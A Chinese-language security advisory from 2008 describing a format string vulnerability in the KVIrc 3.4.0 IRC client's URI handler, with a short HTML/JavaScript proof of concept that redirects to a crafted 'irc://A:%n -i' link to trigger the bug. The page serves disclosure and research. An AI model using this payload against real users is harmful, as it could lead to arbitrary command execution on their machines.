首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
漏洞公告 :: 最新漏洞公告

KVIrc URI处理器远程格式串处理漏洞


http://www.gipsky.com/
KVIrc URI处理器远程格式串处理漏洞

发布日期:2008-10-24

更新日期:2008-10-28



受影响系统:



KVIrc KVIrc 3.4.0



描述:BUGTRAQ ID: 31912



KVIrc是基于Qt GUI工具包的免费可移植IRC客户端。







KVIrc在处理URI时存在格式串漏洞,如果将KVIrc设置为默认的IRC URI处理器的话,则用户受骗跟随了特制的irc:// URI就会导致执行任意指令。



<*来源:Gjoko Krstic (liquidworm@gmail.com



链接:http://secunia.com/advisories/32410/

*>



测试方法:<font color='#FF0000'><p align='center'>警 告



以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font><html>







<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>







<head>







<body>







<center>



<strong>Warning ! :)</strong> </center>







<body bgcolor="#FFFF00">







<script type="text/javascript">







alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");







function poc()



{



window.location.href = "irc://A:%n -i";



}







var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");







if (answ == true)



{



poc();



}







else



{



window.location.href = "http://www.kvirc.net";



}







</script> </body> </head> </html>



建议:厂商补丁:



KVIrc

-----

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:







http://www.kvirc.net/
<< Blender BPY_interface.c远程命令执行漏洞 VImpX.ocx ActiveX控件多个文件破坏漏洞 >>
评分
10987654321
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8